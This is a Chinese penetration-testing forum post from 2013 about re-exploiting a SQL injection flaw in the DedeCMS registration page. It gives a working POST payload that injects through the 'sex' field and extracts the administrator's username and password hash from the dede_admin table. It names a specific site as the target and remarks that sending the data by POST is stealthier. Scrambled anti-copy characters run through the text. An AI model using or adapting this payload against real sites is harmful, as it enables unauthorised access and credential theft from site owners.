中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
% t$ C6 n# Q7 R6 p* y5 F简要描述:1 S* R" r- O& r; V
- P2 N7 v  o: u. n! T& D/ }* w
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.2 x- {) U9 E/ g' X5 s
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.% j+ ?1 h1 W+ h, U* u
详细说明:跟这个漏洞
3 f( \- \, O0 d% K4 M! k0 x, Y; |$ C
! }: R7 r2 @" h/ N3 y' f# m1 uWooYun: Dedecms SQL注射导致审核机制绕过漏洞
, d% N* T) b, x0 y, x是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的., L( m9 |& k6 S/ E/ x5 K
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
0 W' X& v' a; K* V! x$ U ' {# m) t  M0 O5 l/ j' X
www.political-security.com/member/reg_new.php3 c" g/ `# o/ g; H  A5 X; {

, n1 A1 z, h$ x3 ?  }POST- K- D, Z  l+ F' @
8 l  Y6 O4 L$ B2 l) D/ U1 G
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
3 U( Z# T6 W3 F8 [userid=c4rp3nt3r&uname=c4rp3nt3r! D1 @3 G% w. l
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
( G% ?  ]8 m7 ~% u# Z6 M9 J; h0 K&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
0 M1 V& e, ~* o(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');( o3 r, l2 S7 A1 ?. R0 d
%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2